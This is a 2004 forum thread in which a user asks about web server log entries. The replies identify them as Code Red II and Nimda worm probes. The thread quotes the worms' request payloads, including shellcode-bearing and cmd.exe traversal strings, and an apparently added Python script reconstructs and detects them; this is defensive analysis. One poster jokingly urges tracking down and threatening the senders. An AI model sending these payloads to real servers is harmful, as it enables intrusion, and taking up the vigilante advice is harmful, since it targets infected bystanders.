Linux Help
Is This An Attack?
StevenMig
post Mar 18 2004, 04:56 PM
Post #1



Group: Members
Posts: 8
Joined: 29-February 04
Member No.: 2,497



I am not 100% sure if this is the place to ask, but the security forum seemed to only post exploits. Anyway, I set up a web server, just to test it out. I haven't had my computer on too much, only two days, and not even full ones, but I found some interesting log entries:
CODE
68.20.213.67 - - [17/Mar/2004:17:58:06 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 405 "-" "-"

68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 410 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 408 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 465 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:44 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:30 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 410 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:31 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 408 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:31 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:32 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:32 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:32 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:33 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:33 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 465 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:33 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:34 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:34 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:35 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:35 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:35 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:36 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:36 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"

I don't care about the people or tracking them down, but one of my goals for running a server is to help me learn about computer security, so I am wondering if I identified this correctly as an attack. The first one looks like a buffer overflow, and the rest look like a canned program looking for vulnerable scripts or trying to open a command prompt (obviously the attacker or program didn't do any checking, considering most of the requests are for a Windows server).
hughesjr
post Mar 18 2004, 06:09 PM
Post #2



Group: Admin
Posts: 3,433
Joined: 25-July 03
From: Corpus Christi, TX, USA
Member No.: 1,151



The one with all the xxxxxxxxxxxxxxxx's is an infected Code Red II server trying to infect your server.

The ones with the .exe files are NIMDA.

If you were running an IIS server that is unpatched, then it would now be infected....


--------------------
Johnny Hughes
hughesjr@linuxhelp.net
Enterprise Alternatives: CentOS, WhiteBoxEL
Favorite Workstation Distros (in order): CentOS, Gentoo, Debian Sarge, Ubuntu, Mandrake, FedoraCore, Slackware, SUSE
Favorite Server Distros (in order): CentOS, WhiteBoxEL, Debian Sarge, Slackware, Mandrake, FedoraCore, Gentoo, SUSE
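The two families named above can be picked out of an access log mechanically, and the odd spellings in the Nimda lines (`..%255c..`, `..%c1%1c..`, `..%c0%af..`) only make sense once you decode them the way a vulnerable IIS did. The Python below is an added example written for this page, not code from the thread or from any of the posters. The log lines in it are constructed from the request shapes quoted in the thread, with documentation addresses (192.0.2.x) in place of the real source IPs, and `lenient_utf8` / `iis_style_decode` are a deliberately simplified model of the two IIS decoding flaws these probes rely on (the overlong-UTF-8 folder traversal of MS00-078 and the superfluous second percent-decode fixed in MS01-026), not IIS's actual code.

```python
import posixpath
import re
from typing import Optional
from urllib.parse import unquote_to_bytes

# Constructed sample (not the poster's log); 192.0.2.x stands in for the real sources.
CODE_RED_II_PAYLOAD = ("X" * 224
    + "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
    + "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [17/Mar/2004:17:58:06 -0500] "GET /default.ida?'
    + CODE_RED_II_PAYLOAD + ' HTTP/1.0" 404 405 "-" "-"',
    '192.0.2.20 - - [17/Mar/2004:19:39:41 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 410 "-" "-"',
    '192.0.2.20 - - [17/Mar/2004:19:39:42 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"',
    '192.0.2.20 - - [17/Mar/2004:19:39:42 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"',
    '192.0.2.20 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"',
    '192.0.2.20 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"',
    '192.0.2.30 - - [18/Mar/2004:08:00:00 -0500] "GET /index.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
])

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
                    r'(?P<status>\d{3}) (?P<size>\S+)')
# Code Red II pads /default.ida with 224 'X's before the %u-encoded shellcode;
# the earlier Code Red used 'N's (a generalisation beyond the thread's one sample).
CODE_RED_RE = re.compile(r'^/default\.ida\?(?P<pad>[NX])+%u')
# Nimda asks for root.exe (the cmd.exe copy Code Red II leaves behind) or for
# cmd.exe itself, passing "/c dir" as the command, through many path encodings.
NIMDA_RE = re.compile(r'/(root|cmd)\.exe\?/c\+', re.IGNORECASE)


def classify(target: str) -> Optional[str]:
    """Name the worm family a request target matches, or None."""
    m = CODE_RED_RE.match(target)
    if m:
        return 'Code Red II' if m['pad'] == 'X' else 'Code Red'
    return 'Nimda' if NIMDA_RE.search(target) else None


def lenient_utf8(data: bytes) -> str:
    """Simplified model (an assumption, not IIS's code) of the MS00-078 decoder:
    a 0xC0-0xDF lead byte plus the next byte form one character, overlong forms
    are accepted and the continuation byte is never validated: C0 AF -> '/', C1 1C -> '\\'."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return ''.join(out)


def iis_style_decode(target: str) -> str:
    """Percent-decode the path twice (the superfluous second decode fixed in
    MS01-026, so %255c -> %5c -> '\\'), then apply the lenient UTF-8 decoder."""
    path = target.split('?', 1)[0]
    return lenient_utf8(unquote_to_bytes(unquote_to_bytes(path)))


def resolve(decoded_path: str):
    """Treat '\\' as '/', collapse '..' from the web root; returns (escapes_webroot, path)."""
    norm = posixpath.normpath(decoded_path.replace('\\', '/').lstrip('/'))
    return norm == '..' or norm.startswith('../'), norm


def analyze(log_text: str) -> list:
    """One finding per worm probe: source, family, what the path would have
    resolved to on a vulnerable host, and whether this server served it."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        worm = classify(m['target'])
        if worm is None:
            continue
        escapes, norm = resolve(iis_style_decode(m['target']))
        status = int(m['status'])
        findings.append({'ip': m['ip'], 'worm': worm, 'status': status,
                         'normalised': norm, 'escapes_webroot': escapes,
                         # 4xx means Apache refused; unpatched IIS would answer 200 with "dir" output.
                         'served': 200 <= status < 300})
    return findings


def summarize(findings: list) -> dict:
    """Per-source roll-up: family, probe count, whether any probe succeeded."""
    by_ip = {}
    for f in findings:
        s = by_ip.setdefault(f['ip'], {'worm': f['worm'], 'probes': 0, 'served': False})
        s['probes'] += 1
        s['served'] = s['served'] or f['served']
    return by_ip


if __name__ == '__main__':
    for f in analyze(SAMPLE_LOG):
        print(f['ip'], f['worm'], f['status'], f['normalised'], f['escapes_webroot'])
```

Run it and every traversal-style Nimda probe resolves to `../winnt/system32/cmd.exe` (or further up), i.e. outside the web root, which is the whole point of the different spellings: Apache decodes once, does not treat a backslash or an overlong UTF-8 byte pair as a separator, looks for a file literally named that way, finds none and answers 404 (400 for the malformed `%%35c` forms), whereas the decoder modelled here turns all of them into the same backslash-separated path. The `served` flag is the first thing to check when triaging such a log: as long as no probe got a 2xx, the worm found nothing to infect.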
Termina
post Mar 18 2004, 06:18 PM
Post #3



Group: Support Specialist
Posts: 862
Joined: 18-February 04
From: Wisconsin
Member No.: 2,404



QUOTE
don't care about the people or tracking them down


Screw that, track down the bastards and make them pay. If not legally, then get the home address, and... *coughs*

*darts eyes around, and hands him a hatchet*


--------------------
*Points finger at the author above him* They're a witch! Burn them!
---
Visit my website!
Join me in IRC! Server: st0rage.org Channel: #UnhandledExceptions
Robert83
post Mar 18 2004, 06:20 PM
Post #4



Group: Support Specialist
Posts: 1,439
Joined: 3-January 04
From: Germany
Member No.: 2,069



yeah :)

give her/him a zergling rush :) :) :)


Sincerely
Robert B


--------------------
Robert Becskei
robert83@linuxhelp.net
--------------------
May the source be with us!
--------------------
AMD X2-3800 @ 2400Mhz
2048MB DDR 400Mhz
DFI Lanparty UT4 NF4 ULTRA-D
GeForce 7800GT
250GB+250GB
Pioneer DVD-RW
17inch Samsung Syncmaster 757NF
WinXP Pro (SP2)/ CentOS 4.3
--------------------
StevenMig
post Mar 18 2004, 06:35 PM
Post #5



Group: Members
Posts: 8
Joined: 29-February 04
Member No.: 2,497



Wow, less than a day of uptime and this already. Anyway, should I really track them down?
Now I know I have to get my act together. If anything targeted me, I think I'd be pretty screwed. I haven't changed anything on my Apache server.
Termina
post Mar 18 2004, 07:16 PM
Post #6



Group: Support Specialist
Posts: 862
Joined: 18-February 04
From: Wisconsin
Member No.: 2,404



Yes, you really should.

At least scare them for a while. If you let them think they can get away with this kind of shit, they'll just keep doing it. If you threaten them with a lawsuit (especially if they're under 18), they'll piss themselves.


hughesjr
post Mar 18 2004, 07:17 PM
Post #7



Group: Admin
Posts: 3,433
Joined: 25-July 03
From: Corpus Christi, TX, USA
Member No.: 1,151



There are thousands of NIMDA- and CODE RED-infected servers out there ... they aren't doing it on purpose. (It is a worm ... if your server is infected .. it automatically tries to infect other servers). So long as you are not running IIS, I would just not worry about it. If you are running IIS and you haven't patched ... get a good anti-virus program and scan your PC...


Termina
post Mar 18 2004, 07:24 PM
Post #8



Group: Support Specialist
Posts: 862
Joined: 18-February 04
From: Wisconsin
Member No.: 2,404



Ah... *falls over*

Too bad. =/ I... hate... people who do that kind of stuff. >_<

*grumbles and mutters*

Robert: Do you play Starcraft (currently)? If so, want to face me sometime? (Haven't played in a few months, but would love a match sometime)

